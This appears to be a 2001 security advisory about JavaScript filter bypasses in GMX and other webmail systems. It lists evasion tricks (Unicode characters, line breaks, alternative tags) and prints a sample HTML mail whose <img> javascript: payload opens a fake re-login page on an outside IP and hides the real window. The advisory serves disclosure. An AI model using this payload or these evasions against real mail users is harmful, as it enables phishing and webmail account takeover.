java-script filter problem in webmail-systems(gmx.net and others)


UPDATE 2001/06/11
after testing 8 independent and different free webmail systems i found
out, that this bug applied in various varieties :-) is extremely DANGEROUS.
(the only "untouched" system by now is HOTMAIL !?)

(new)variations of this attack:

1) the <img> tag is just 1 of manny possibilities placing JS-code in html-messages!
2) using UC-chars, lf s and cr s evades many JS-filters!
3) possible use of named- and unicode characters!
4) mannny other tags possible (bgsound,table,object,meta-tags in head aso.....)


the "old" adivsory:
problem description:
the <img> - tag can be used to embedd malicious
java-scripts within html-mails

once the "html-mailpart" is opened by the gmx-user it is possible
the "embedded" java-script is executed by the web-browser(if enabled:-) this makes it possible to place trojans and execute URL-based webmail-commands
leading to a total compromise of the users webmail-account.

BTW: .. THIS works for mannnnny other webmail-systems
(check out www.a-topmail.at)

sample with simple relogin-trojan:

---cut here---

<html><body> <img src="javascript: gmx=window.open('http://216.147.4.38/gmx/index.html','gmx',width='1000',height='800'); window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resizeTo(1,1);w=screen.availWidth;h=screen.availHeight-40;gmx.moveTo(0,0);gmx.resizeTo(w,h);gmx.focus();"> <h4>mungo baby</h4></body></html> ---cut here---



RC-EOF